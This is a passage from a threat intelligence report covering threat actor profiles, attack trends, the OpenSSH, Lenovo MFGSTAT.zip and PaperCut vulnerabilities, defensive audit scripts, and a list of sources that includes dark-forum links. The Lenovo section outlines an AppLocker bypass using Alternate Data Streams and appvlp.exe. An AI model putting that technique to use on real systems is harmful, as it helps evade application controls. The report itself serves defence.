Storm-0539 | Atlas Lion | Financial gain (gift card/payment fraud) | Phishing/smishing, device registration for persistence, cloud resource abuse, nation-state TTPs | Gift card issuers, retailers |
Handala Hack Group | None listed | Geopolitical (pro-Palestinian) | Phishing, ransomware (double extortion), defacement, PA system disruption, wipers (Hamsa, Hatef) | Israeli critical infrastructure, kindergartens, DRS RADA, Ma’agan Michael Kibbutz, Zerto, Soreq Nuclear Research Center, radar systems |
Ghost Ransomware Group | Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, Rapture | Financial gain | Exploiting outdated software, web shells, Cobalt Strike, Mimikatz, disabling AV, rapid deployment | Critical infrastructure, healthcare, schools, government, tech, manufacturing (70+ countries) |
_Sentap | None listed | Financial gain | Website cloning, WAF bypass, crypto draining, selling large datasets | US property title companies (1.02 TB property data) |
Scattered Spider | None listed | Financial gain (data theft, extortion, ransomware) | Social engineering (IT help desk impersonation), MFA bypass, rapid double extortion, extensive reconnaissance | Aviation industry, CFOs, third-party IT providers |
Lazarus Group | APT38 | State-sponsored revenue generation (DPRK) | Virtual currency heists, fund movement across crypto networks | Stake.com, Alphapo, CoinsPaid, Atomic Wallet, Harmony’s Horizon bridge, Sky Mavis’ Ronin Bridge |
Bl00dy / Clop / LockBit Ransomware Operations | Lace Tempest, FIN11, TA505 (Clop-linked cluster) | Financial gain (ransomware, extortion) | Exploiting critical server vulnerabilities (PaperCut), RCE, data exfiltration, rapid operationalization of 0-days | Education sector, organizations with PaperCut vulnerabilities |
GhostSec | GhostSecMafia, GSM | Ideological (hacktivism) | Subscription-based Telegram channel (leaks, tutorials), organized roles, mutual support | Not specified in provided intelligence |
Z-PENTEST ALLIANCE | | Geopolitical (pro-Russian) | Penetrating OT/ICS/SCADA, zero-day exploitation, social engineering, propaganda, fear tactics | Energy (oil/gas) and water sectors in Western countries |
4. Analysis of Observed Trends & TTPs
This section synthesizes information from individual incidents and actor profiles to identify broader trends and evolving Tactics, Techniques, and Procedures (TTPs) in the current threat landscape.
4.1. Convergence of TTPs Across Threat Actor Categories
A significant trend is the blurring of lines between financially motivated cybercriminals and nation-state actors. Financially driven groups are adopting techniques traditionally associated with state-sponsored espionage. For instance, Storm-0539, a group focused on gift card fraud, conducts reconnaissance and abuses cloud resources in ways strikingly similar to nation-state actors.8 This indicates a professionalization of cybercrime, in which advanced capabilities are becoming more accessible or are shared and adopted across actor types. Similarly, Pryx, while primarily financially motivated through the Hellcat ransomware operation, also exhibits clear geopolitical leanings and develops novel tooling such as Tor-based server-side stealers.5 Operational methods are therefore no longer neatly confined to traditional actor categories. Defenders cannot rely on actor categorization alone to predict TTPs and must instead build robust defenses against a wide array of advanced techniques, regardless of the adversary's ultimate motivation.
4.2. Escalation of Critical Infrastructure Targeting
Geopolitically motivated groups, some with suspected state affiliations, are increasingly focusing their attacks on critical infrastructure sectors such as energy, water, healthcare, and government. Their objectives often extend beyond data theft to direct disruption or strategic influence. The Z-PENTEST ALLIANCE, with its ties to pro-Russian actors, specifically targets operational technology (OT) and industrial control systems (ICS/SCADA) in Western countries’ energy and water sectors. Their stated aim is to weaken these systems and thereby strengthen Russia’s geopolitical influence.21 Concurrently, the Handala Hack group, linked to Iran’s Ministry of Intelligence, has targeted Israeli critical infrastructure, including kindergartens (disrupting public address systems), radar systems, and even a nuclear research center. This group has also engaged in destructive data deletion, claiming to have exfiltrated and deleted a massive 51 terabytes of data from a Hewlett Packard Enterprise subsidiary.9 This consistent targeting and the destructive capabilities employed signify a shift towards more impactful cyber operations with direct geopolitical consequences, representing a significant escalation in cyber conflict that moves beyond traditional espionage to direct operational disruption.
4.3. Rapid Operationalization of Vulnerabilities
Newly disclosed critical vulnerabilities are weaponized and exploited by multiple threat actors within days, narrowing the window in which organizations can patch. The exploitation of the PaperCut server vulnerabilities (CVE-2023-27350, CVE-2023-27351) by multiple ransomware groups, including Bl00dy, Clop, and LockBit, shortly after disclosure exemplifies this speed.19 That these vulnerabilities were “detected as being actively exploited in the wild by cyber threat actors” 19 underscores the short time-to-exploit. Separately, the advertisement on a dark forum of a “buffer overflow 0day vulnerability” for OpenSSH 10.0p2 (an unverified claim; see Section 5.1) shows that critical software components are under constant scrutiny and that purported flaws are traded in the underground ahead of any public disclosure. This “race to exploit” dynamic means the window to patch critical vulnerabilities before active exploitation is extremely narrow; reactive patching alone is often insufficient, and reducing exposure (removing unnecessary internet-facing services and segmenting the rest) has to run in parallel.
4.4. The Pervasive Risk of Commercial Spyware and Dual-Use Tools
The existence and proliferation of commercial surveillance tools, even those developed for “lawful” purposes, pose a significant risk when they fall into the wrong hands or are misused. The case of Hacking Team, a company that sold advanced intrusion and surveillance capabilities, illustrates this danger. Their software was reportedly used by corrupt Mexican officials to target journalists on behalf of drug cartels.7 This exemplifies a dual-use scenario where tools intended for legitimate purposes are diverted for illicit activities. Moreover, Hacking Team’s own major data breach in 2015, which leaked their source code and internal documents, meant that these powerful tools became accessible to a wider range of malicious actors.7 This effectively democratizes sophisticated cyber capabilities, empowering non-state actors with state-level tools and highlighting a broader implication for national security and human rights, necessitating stricter controls and oversight on the development and sale of such technologies.
4.5. The Human Element as a Critical Attack Surface
Social engineering continues to be a highly effective and frequently used initial access vector, even for advanced threat actors, underscoring the enduring importance of human vigilance and robust identity verification. Scattered Spider’s primary reliance on “social engineering techniques, often impersonating employees or contractors to deceive IT help desks into granting access” 16 exemplifies this. Their ability to bypass multi-factor authentication (MFA) through manipulating help desk personnel to reset MFA devices and credentials 16 demonstrates a significant vulnerability in organizational identity verification processes. Similarly, Storm-0539 extensively uses phishing and smishing tactics for initial access.8 This consistent emphasis across different actor profiles indicates that technical controls alone are insufficient if human vulnerabilities are not addressed through comprehensive training and stringent verification processes. This means that security awareness training, coupled with multi-factor authentication and strict identity verification protocols for sensitive operations (like password resets), is paramount.
4.6. Dark Web Market Dynamics and Law Enforcement Impact
Dark web forums remain central to the cybercrime ecosystem for trading stolen data and access, but they are subject to ongoing law enforcement disruption, which shifts actor activity and the forum landscape. The arrests of prominent actors such as IntelBroker and ShinyHunters, and the repeated disruption and re-launch of BreachForums, illustrate law enforcement's impact on these marketplaces.30 Despite these disruptions, new forums consistently emerge and actors adapt their operations. The numerous dark forum links in the provided intelligence that were inaccessible at the time of compilation, even though their thread titles indicate active data sales (e.g., the AKB48 database, Subway Guatemala 42, Indian Vodafone 43, Russian Military Unit data 44, and various PII and RDP access listings), reinforce the ephemeral nature of these markets. While law enforcement can achieve significant successes, the underlying market for illicit data and access persists and adapts quickly, requiring continuous monitoring of the shifting underground landscape.
5. Vulnerabilities Highlighted
This section details specific vulnerabilities that have been actively exploited or discussed in the context of recent incidents, providing technical context and implications.
5.1. OpenSSH 10.0p2 Security Advisory (CVE-2025-32728 and Reported 0-day)
CVE-2025-32728 affects sshd in OpenSSH releases before 10.0. The DisableForwarding directive, documented as disabling X11 and agent forwarding (among other forwarding types), did not in fact disable those two, potentially leaving them enabled on hosts whose administrators relied on the directive alone.45 The vulnerability is rated moderate severity. Operators who cannot move to 10.0 should set X11Forwarding no and AllowAgentForwarding no explicitly rather than relying on DisableForwarding, and verify the effective configuration with sshd -T. Beyond this publicly disclosed CVE, an advertisement appeared on a dark forum for a “buffer overflow 0day vulnerability” in the OpenSSH 10.0p2 portable release.46 The specific link is inaccessible and the claim is unverified; note that 10.0p2 already contains the fix for CVE-2025-32728, so the two issues are distinct. Nonetheless, the presence of such a claim in underground channels indicates active interest in weaponizing flaws in this critical software.
OpenSSH is a foundational component for secure remote access in most environments. Any vulnerability, whether a zero-day or a configuration directive that does not enforce what it documents, can give attackers a foothold for initial access, lateral movement, and data exfiltration. The rapid discussion and potential exploitation of such flaws in underground forums underscore the need to track and apply OpenSSH patches promptly and to verify that security-relevant directives behave as configured. A publicly known flaw and a reported zero-day in consecutive releases of the same software show how intensely critical components are scrutinized: even well-maintained software can carry undisclosed or newly discovered vulnerabilities, and the window for defense is shrinking.
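The check suggested above, written out as an added example (not code from the report or from the OpenSSH project): it parses a captured `sshd -T` dump together with the `ssh -V` banner and flags X11 or agent forwarding that is only "disabled" through DisableForwarding on a version older than 10.0, where the directive did not cover them. The dumps below are constructed, not taken from a real host; the version comparison is by upstream release number, so a distribution that backported the fix to an older version string will show a false positive until you confirm against the vendor advisory.

```python
import re

# Constructed sample of `sshd -T` output (not a real host's dump); only the
# keywords relevant to CVE-2025-32728 are shown.  `sshd -T` prints the
# effective value of every keyword, one per line, with keywords lowercased.
SAMPLE_DUMP_RELIES_ON_DISABLEFORWARDING = """\
port 22
disableforwarding yes
x11forwarding yes
allowagentforwarding yes
allowtcpforwarding yes
"""

# Same host with the per-feature directives set explicitly (the recommended state).
SAMPLE_DUMP_EXPLICIT = """\
port 22
disableforwarding yes
x11forwarding no
allowagentforwarding no
allowtcpforwarding no
"""


def parse_sshd_dump(dump: str) -> dict:
    """Turn `sshd -T` output into a {keyword: value} map."""
    cfg = {}
    for line in dump.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        cfg[key.lower()] = value.strip()
    return cfg


def parse_openssh_version(banner: str) -> tuple:
    """Extract (major, minor) from an `ssh -V` banner such as 'OpenSSH_9.9p1 ...'."""
    m = re.search(r"OpenSSH_(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError(f"not an OpenSSH version banner: {banner!r}")
    return int(m.group(1)), int(m.group(2))


def forwarding_findings(banner: str, dump: str) -> list:
    """Report X11/agent forwarding that is 'disabled' only via DisableForwarding
    on an sshd older than 10.0 (CVE-2025-32728).  An explicit per-feature 'no'
    is honoured on every version, so it never produces a finding."""
    cfg = parse_sshd_dump(dump)
    version = parse_openssh_version(banner)
    blanket = cfg.get("disableforwarding") == "yes"
    # Upstream fixed the directive in 10.0.  A distro may backport the fix under
    # an older version string; treat a finding on such a host as "confirm with vendor".
    blanket_trusted = version >= (10, 0)
    findings = []
    for key, label in (("x11forwarding", "X11 forwarding"),
                       ("allowagentforwarding", "agent forwarding")):
        value = cfg.get(key, "unset")
        if value == "no":
            continue                      # explicitly off: safe on all versions
        if blanket and blanket_trusted:
            continue                      # DisableForwarding works on >= 10.0
        if blanket:
            findings.append(f"{label} relies on DisableForwarding, which is not "
                            f"honoured before 10.0 (CVE-2025-32728); set '{key} no'")
        else:
            findings.append(f"{label} is enabled ({key} {value})")
    return findings


if __name__ == "__main__":
    for banner, dump in (("OpenSSH_9.9p1", SAMPLE_DUMP_RELIES_ON_DISABLEFORWARDING),
                         ("OpenSSH_9.9p1", SAMPLE_DUMP_EXPLICIT),
                         ("OpenSSH_10.0p2", SAMPLE_DUMP_RELIES_ON_DISABLEFORWARDING)):
        print(banner, forwarding_findings(banner, dump) or ["ok"])
```

On a live host, feed it the output of `sudo sshd -T` (root is required, and Match blocks are only evaluated if you pass `-C` with connection parameters) and `ssh -V 2>&1`.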
5.2. Lenovo MFGSTAT.zip AppLocker Bypass Vulnerability
A significant vulnerability affects Lenovo computers that ship with the manufacturer’s default Windows image. The file C:\Windows\MFGSTAT.zip has insecure file permissions, allowing any authenticated user on the system to write to it. Under default AppLocker rules, any executable within the C:\Windows directory is permitted to run, making this a problematic configuration.47
Attackers can leverage Windows’ Alternate Data Streams (ADS) to attach a malicious binary to MFGSTAT.zip without overwriting the original file. The payload can then be launched through a legitimate Windows utility, such as appvlp.exe from Microsoft Office, bypassing AppLocker’s application whitelisting restrictions.47 Lenovo’s Product Security Incident Response Team (PSIRT) acknowledged the issue but opted not to release a patch, instead publishing guidance recommending manual removal of the file.47 This shifts the burden of mitigation to end users and organizations and highlights the importance of scrutinizing default file permissions, especially in system directories that default application-control rules trust wholesale. Until the file is removed, an explicit AppLocker deny rule for it limits the exposure, and the same audit should look for any other user-writable file under C:\Windows. The file has been a source of user concern for years because it is password-protected and sits in the Windows directory, indicating a long-standing oversight that now requires manual intervention. Organizations must therefore audit pre-installed software and default configurations themselves, as relying solely on vendor patches may not be sufficient.
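An audit check for the two conditions that make this case exploitable (a file that a low-privilege principal can modify, sitting in a path AppLocker's default rules allow), added here as an example and not code from the report or from Lenovo. It parses captured `icacls` output; the output samples are constructed to match the described permission problem, not captured from a real Lenovo image, and the principal and rights lists are the editor's assumptions about which grants matter. The same routine serves the "audit default file permissions" advice in Section 6.4 for any other file.

```python
import re

MFGSTAT_PATH = r"C:\Windows\MFGSTAT.zip"

# Constructed `icacls C:\Windows\MFGSTAT.zip` output modelled on the issue:
# a Modify grant to Authenticated Users alongside the inherited defaults.
ICACLS_BEFORE = r"""C:\Windows\MFGSTAT.zip NT AUTHORITY\Authenticated Users:(M)
                       NT AUTHORITY\SYSTEM:(I)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Same file with only the inherited defaults (read/execute for Users).
ICACLS_AFTER = r"""C:\Windows\MFGSTAT.zip NT AUTHORITY\SYSTEM:(I)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that every authenticated (or anonymous) user is a member of (assumption).
LOW_PRIV = {"everyone", r"nt authority\authenticated users", r"builtin\users",
            r"nt authority\interactive", "authenticated users", "users"}
# icacls rights that allow changing file contents, attributes or the DACL (assumption).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO", "GW", "GA"}
# Default AppLocker executable rules allow anything under these folders.
APPLOCKER_DEFAULT_ALLOW = ("c:\\windows\\", "c:\\program files\\",
                           "c:\\program files (x86)\\")


def parse_icacls(output: str, path: str) -> list:
    """Return [(principal, [rights...])] from icacls output for a single path."""
    aces = []
    for line in output.splitlines():
        text = line.strip()
        if not text or text.startswith("Successfully processed"):
            continue
        if text.lower().startswith(path.lower()):
            text = text[len(path):].strip()      # first line carries the path
        principal, _, rights = text.rpartition(":")
        tokens = [t for grp in re.findall(r"\(([A-Z,]+)\)", rights)
                  for t in grp.split(",")]
        aces.append((principal, tokens))
    return aces


def low_priv_writers(output: str, path: str) -> list:
    """ACEs that let a low-privilege principal modify the file."""
    return [(p, r) for p, r in parse_icacls(output, path)
            if p.lower() in LOW_PRIV and WRITE_RIGHTS & set(r)]


def applocker_writable_risk(output: str, path: str) -> dict:
    """Flag a user-writable file inside a path that default AppLocker rules allow."""
    writers = low_priv_writers(output, path)
    in_allowed = path.lower().startswith(APPLOCKER_DEFAULT_ALLOW)
    return {"path": path, "user_writable": bool(writers),
            "in_default_allow_path": in_allowed,
            "exploitable": bool(writers) and in_allowed, "writers": writers}


if __name__ == "__main__":
    for label, sample in (("before", ICACLS_BEFORE), ("after", ICACLS_AFTER)):
        print(label, applocker_writable_risk(sample, MFGSTAT_PATH))
```

To run it against a real machine, capture `icacls C:\Windows\MFGSTAT.zip` (or the output of `icacls C:\Windows /t` split per path) and pass it in; a finding of `exploitable: True` means the file should be removed per Lenovo's guidance or covered by a deny rule.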
5.3. PaperCut Server Vulnerabilities (CVE-2023-27350, CVE-2023-27351)
Two critical vulnerabilities have been identified in PaperCut MF and NG software: CVE-2023-27350, which allows unauthenticated remote code execution, and CVE-2023-27351, which permits unauthenticated data retrieval, including hashed passwords for internal users.19
These vulnerabilities have been actively exploited in the wild by multiple ransomware groups, including Bl00dy, Clop, and LockBit; the Clop activity overlaps with the cluster tracked as Lace Tempest, FIN11, and TA505.19 Exploitation allows adversaries to achieve remote code execution, exfiltrate sensitive data, and deploy ransomware. The software developer confirmed that both vulnerabilities were detected as being actively exploited.19 The rapid, widespread exploitation by financially motivated ransomware groups underscores the importance of immediate patching for publicly exposed applications. Remote code execution combined with credential theft makes these flaws highly attractive for initial access and privilege escalation, so the speed of patching must match or exceed the speed of exploitation, especially for internet-facing services. Print-management servers such as PaperCut rarely need to be reachable from the internet at all, and removing that exposure is the complementary control when a patch cannot be applied within hours.
6. Recommendations for Enhanced Defense
Based on the observed incidents, threat actor TTPs, and highlighted vulnerabilities, the following recommendations are crucial for strengthening organizational cybersecurity posture.
6.1. Prioritize and Accelerate Patch Management
Organizations must implement a stringent and rapid patch management policy, particularly for internet-facing applications and critical infrastructure components. Given the “hack before we patch” strategy employed by groups like Ghost ransomware 13, the window for mitigation is extremely narrow. Actionable steps include automating vulnerability scanning and patch deployment where feasible, establishing clear Service Level Agreements (SLAs) for patching critical and high-severity vulnerabilities, and subscribing to vendor security advisories and CISA’s Known Exploited Vulnerabilities (KEV) catalog for timely alerts.19
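The KEV-driven prioritisation recommended here, with the PaperCut CVEs from Section 5.3 as the worked case, as an added example (not code from the report or from CISA): it indexes a feed in the layout of CISA's KEV JSON and ranks scanner findings by KEV membership, internet exposure, known ransomware use, and days past CISA's due date. The feed excerpt and the findings list are constructed for illustration; field names follow the real feed, but the dates and the set of listed CVEs are not the live catalog, and the ranking order is the editor's choice, not a CISA rule.

```python
import json
from datetime import date

# Constructed excerpt in the layout of CISA's KEV JSON feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# Field names follow the feed; values are illustrative, not the live catalog.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2023-27350", "vendorProject": "PaperCut", "product": "MF/NG",
         "vulnerabilityName": "PaperCut MF/NG Improper Access Control Vulnerability",
         "dateAdded": "2023-04-21", "dueDate": "2023-05-12",
         "requiredAction": "Apply updates per vendor instructions.",
         "knownRansomwareCampaignUse": "Known"},
    ],
})

# Constructed scanner findings: CVE, the asset it was found on, and exposure.
FINDINGS = [
    {"cve": "CVE-2025-32728", "asset": "bastion-01", "internet_facing": False},
    {"cve": "CVE-2023-27351", "asset": "print-srv-01", "internet_facing": True},
    {"cve": "CVE-2023-27350", "asset": "print-srv-01", "internet_facing": True},
]


def load_kev(kev_json: str) -> dict:
    """Index a KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def triage(findings: list, kev: dict, today: date) -> list:
    """Rank findings: KEV-listed first, then internet-facing, then known
    ransomware use, then by how far past CISA's due date they are."""
    ranked = []
    for f in findings:
        entry = kev.get(f["cve"])
        in_kev = entry is not None
        ransomware = in_kev and entry.get("knownRansomwareCampaignUse") == "Known"
        overdue_days = None
        if in_kev:
            overdue_days = (today - date.fromisoformat(entry["dueDate"])).days
        ranked.append({**f, "in_kev": in_kev, "ransomware_use": ransomware,
                       "overdue_days": overdue_days,
                       "action": entry["requiredAction"] if in_kev
                       else "not in KEV: track vendor advisory, patch per SLA"})
    ranked.sort(key=lambda r: (r["in_kev"], r["internet_facing"],
                               r["ransomware_use"], r["overdue_days"] or 0),
                reverse=True)
    return ranked


def demo(today: date = date(2025, 7, 4)) -> list:
    """Run the triage over the constructed samples (date fixed for reproducibility)."""
    return triage(FINDINGS, load_kev(KEV_SAMPLE), today)


if __name__ == "__main__":
    for row in demo():
        print(row["cve"], row["asset"], "KEV" if row["in_kev"] else "-",
              row["overdue_days"], row["action"])
```

In production, replace `KEV_SAMPLE` with the downloaded feed and `FINDINGS` with the scanner export; anything that lands at the top with a positive `overdue_days` and `internet_facing` set is already past CISA's remediation deadline on an exposed asset and should jump the normal patch SLA.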
6.2. Strengthen Identity and Access Management (IAM) & MFA Enforcement
Enhancing identity verification processes is paramount, especially for IT help desks and privileged account actions such as multi-factor authentication (MFA) resets. Organizations should implement robust MFA across all accounts, particularly for administrative and critical business systems. Employees must be educated on social engineering tactics, including phishing and smishing, and IT support staff should be rigorously trained on verifying identities for sensitive requests.8 Continuous monitoring for suspicious device registrations and MFA bypass attempts is also essential.
6.3. Fortify Operational Technology (OT) and Industrial Control Systems (ICS) Security
Organizations operating critical infrastructure within sectors like energy, water, and manufacturing must implement specialized security measures for their OT/ICS environments. This involves isolating OT networks from IT networks to prevent lateral movement of threats. Implementing strong access controls and continuous monitoring for anomalous activity within ICS/SCADA systems is crucial. Regular vulnerability assessments and penetration tests specifically tailored to OT environments are also recommended to identify and mitigate unique risks.21
6.4. Enhance Supply Chain and Third-Party Risk Management
It is critical to scrutinize pre-installed software and default configurations from hardware vendors and to implement robust security assessments for third-party IT providers and partners. Organizations should audit default file permissions on newly acquired systems, following vendor guidance such as the removal of the Lenovo MFGSTAT.zip file.47 Implementing strict contractual security requirements for third-party vendors and regularly auditing their security posture, especially if they have access to internal systems, is vital.16
6.5. Implement Comprehensive Data Protection and Backup Strategies
Protecting sensitive data from exfiltration and ensuring rapid recovery from ransomware attacks are fundamental. Organizations should regularly back up critical data, storing copies offline or in segmented, immutable environments. Implementing data loss prevention (DLP) solutions can help prevent unauthorized data exfiltration. Encrypting sensitive data at rest and in transit adds another layer of defense. Developing and regularly testing incident response and disaster recovery plans, including specific playbooks for ransomware and data exfiltration scenarios, is also crucial.9
6.6. Leverage Advanced Threat Intelligence
Integrating up-to-date threat intelligence is essential for understanding adversary motivations, TTPs, and emerging campaigns. Organizations should subscribe to reputable threat intelligence feeds and utilize frameworks like MITRE ATT&CK to map observed adversary behaviors to known techniques. Conducting proactive threat hunting based on intelligence can help detect early indicators of compromise.27 Paying close attention to reports on commercial spyware proliferation and dark web market trends can provide early warnings of new threats.
6.7. Continuous Security Awareness Training
Regularly training all employees on the latest cyber threats is paramount, with a focus on recognizing phishing, smishing, and social engineering attempts. Organizations should conduct simulated phishing exercises and provide clear guidelines on reporting suspicious activity. Emphasizing the importance of strong password hygiene and the proper use of multi-factor authentication (MFA) can significantly reduce the human attack surface.8
7. All Incidents Data
Works cited
- Threat Actor Profile – GhostSec – Outpost24, accessed July 4, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
- https://darkforums.st/Thread-Selling-Subway-Guatemala-Database-52904-Email-Full-name-Txn-Employe-pswds-Gift-Codes (link inaccessible; no access date recorded)
- Dmitry Volkov | Group-IB Author, accessed July 4, 2025, https://www.group-ib.com/author/dmitry-volkov/
- #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 4, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
- https://darkforums.st/Thread-Selling-INDIAN-VODAPHONE-DATA-IS-FOR-SELL (link inaccessible; no access date recorded)
- https://ramp4u.io/threads/applocker-bypass-on-lenovo-machines-%E2%80%93-the-curious-case-of-mfgstat-zip.3249/ (link inaccessible; no access date recorded)
- Threat Actor Cards – Recorded Future, accessed July 4, 2025, https://www.recordedfuture.com/support/threat-actor-cards
- openssh-10.0p2-2.1 RPM for x86_64 – RPMfind, accessed July 4, 2025, https://rpmfind.net/linux/RPM/opensuse/tumbleweed/x86_64/openssh-10.0p2-2.1.x86_64.html
- What is a Threat Actor? Types & Examples – SentinelOne, accessed July 4, 2025, https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/
- https://xss.is/threads/141217/ (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-TLALNEPANTLA-EDOMEX (link inaccessible; no access date recorded)
- April 26: Top Threat Actors, Malware, Vulnerabilities and Exploits – Picus Security, accessed July 4, 2025, https://www.picussecurity.com/resource/blog/april-26-top-threat-actors-malware-vulnerabilities-and-exploits
- https://darkforums.st/Thread-Source-Code-INDIAN-JOURNAL-OF-PRACTICAL-PEDIATRICS-DATA-BASE (link inaccessible; no access date recorded)
- Mr. Robot – Wikipedia, accessed July 4, 2025, https://en.wikipedia.org/wiki/Mr._Robot
- 202308161700_China-Based Threat Actor Profiles_TLPCLEAR – HHS.gov, accessed July 4, 2025, https://www.hhs.gov/sites/default/files/china-based-threat-actor-profiles-tlpclear.pdf
- U.S. Targets RedLine and META Infostealers in Operation Magnus – Picus Security, accessed July 4, 2025, https://www.picussecurity.com/resource/blog/us-targets-redline-and-meta-infostealers-in-operation-magnus
- https://xss.is/threads/141212/ (link inaccessible; no access date recorded)
- https://xss.is/threads/141213/ (link inaccessible; no access date recorded)
- Handala Hack: What We Know About the Rising Threat Actor – Cyberint, accessed July 4, 2025, https://cyberint.com/blog/threat-intelligence/handala-hack-what-we-know-about-the-rising-threat-actor/
- https://forum.exploit.in/topic/261885/ (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-Russian-Military-Unit-11387-Database-Sensitive-Internal-Data (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-OpenSSH-10-0p2-portable-verion-Buffer-overflow-0day-vulnerability (link inaccessible; no access date recorded)
- Iranian hacker group targets Israeli kindergartens’ PA systems | Iran International, accessed July 4, 2025, https://www.iranintl.com/en/202501265679
- Flash Report: Prominent Threat Actors Reportedly Arrested – ZeroFox, accessed July 4, 2025, https://www.zerofox.com/intelligence/flash-report-prominent-threat-actors-reportedly-arrested/
- Ghost Squad Hackers – Wikipedia, accessed July 4, 2025, https://en.wikipedia.org/wiki/Ghost_Squad_Hackers
- https://darkforums.st/Thread-Leak-Docs-From-Star-Assurance-Tunisie-Agence (link inaccessible; no access date recorded)
- Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group – The Hacker News, accessed July 4, 2025, https://thehackernews.com/2025/06/over-70-organizations-across-multiple.html
- Threat Actor Profile – Sodinokibi ransomware – Outpost24, accessed July 4, 2025, https://outpost24.com/blog/threat-actor-profile-sodinokibi-ransomware/
- Threat Actor Spotlight: Pryx – Morado Intelligence, accessed July 4, 2025, https://www.morado.io/blog-posts/threat-actor-spotlight-pryx
- Hellcat Hacking Group Unmasked: Investigating Rey and Pryx | KELA Cyber, accessed July 4, 2025, https://www.kelacyber.com/blog/hellcat-hacking-group-unmasked-rey-and-pryx/
- TA829 and UNK_GreenSec Share Tactics and Infrastructure in Ongoing Malware Campaigns – The Hacker News, accessed July 4, 2025, https://thehackernews.com/2025/07/ta829-and-unkgreensec-share-tactics-and.html
- HackingTeam – Wikipedia, accessed July 4, 2025, https://en.wikipedia.org/wiki/HackingTeam
- Cyber Signals: Into the Lion’s Den – Microsoft News, accessed July 4, 2025, https://news.microsoft.com/wp-content/uploads/prod/sites/626/2024/05/Cyber_Signals_Issue_7_May_2024-2.pdf
- Agencies warn of Ghost ransomware activity | AHA News – American Hospital Association, accessed July 4, 2025, https://www.aha.org/news/headline/2025-02-20-agencies-warn-ghost-ransomware-activity
- CISA, FBI, MS-ISAC warn of Ghost ransomware exploiting outdated systems across critical infrastructure – Industrial Cyber, accessed July 4, 2025, https://industrialcyber.co/cisa/cisa-fbi-ms-isac-warn-of-ghost-ransomware-exploiting-outdated-systems-across-critical-infrastructure/
- FBI Warns of Scattered Spider’s Expanding Attacks on Airlines Using Social Engineering, accessed July 4, 2025, https://thehackernews.com/2025/06/fbi-warns-of-scattered-spiders.html
- Flash Report: Threat Actors Seeking to Exploit California Wildfires Recovery Funds, accessed July 4, 2025, https://www.zerofox.com/intelligence/flash-report-threat-actors-seeking-to-exploit-california-wildfires-recovery-funds/
- What is a Cyber Threat Actor? | CrowdStrike, accessed July 4, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
- https://darkforums.st/Thread-Source-Code-SOUTH-BREEZE-SCHOOL-BANGLADESH-DATA-BASE (link inaccessible; no access date recorded)
- THE ROLE OF FGF23/KLOTHO IN MINERAL METABOLISM … – CORE, accessed July 4, 2025, https://core.ac.uk/download/70340681.pdf
- https://t.me/handala_hack27/72 (link inaccessible; no access date recorded)
- suspicious-file-MFGSTAT-zip – LENOVO COMMUNITY, accessed July 4, 2025, https://forums.lenovo.com/t5/Security-Malware/suspicious-file-MFGSTAT-zip/m-p/5225097
- https://darkforums.st/Thread-500K-TORGI-GOV-RU (link inaccessible; no access date recorded)
- https://xss.is/threads/141216/ (link inaccessible; no access date recorded)
- https://forum.exploit.in/topic/261901/?do=findComment&comment=1579277 (link inaccessible; no access date recorded)
- https://leakbase.la/threads/splento-com-2-2gb-database.40019/ (link inaccessible; no access date recorded)
- Cyber Kill Chain® | Lockheed Martin, accessed July 4, 2025, https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
- https://darkforums.st/Thread-AKB48-DATABASE-HQ-MEMBERSHIP-AND-USER (link inaccessible; no access date recorded)
- https://t.me/c/2656447819/67 (link inaccessible; no access date recorded)
- https://forum.exploit.in/topic/261896/?tab=comments#comment-1579251 (link inaccessible; no access date recorded)
- https://t.me/Z_alliance_ru/325 (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-Selling-Morocco-social-insurance-April-DB (link inaccessible; no access date recorded)
- https://xss.is/threads/141215/ (link inaccessible; no access date recorded)
- https://xss.is/threads/141214/ (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-150K-UK-CAR-INSURANCE-MEMBERS (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-Document-DATABASE-BPJS-FORM-INDONESIA–15996 (link inaccessible; no access date recorded)
- https://xss.is/threads/141210/ (link inaccessible; no access date recorded)
- https://forum.exploit.in/topic/261887/ (link inaccessible; no access date recorded)
- https://t.me/liwaamohammad/454 (link inaccessible; no access date recorded)
- https://darkforums.st/Thread-Document-Emirate-secret-data (link inaccessible; no access date recorded)
- https://xss.is/threads/141206/ (link inaccessible; no access date recorded)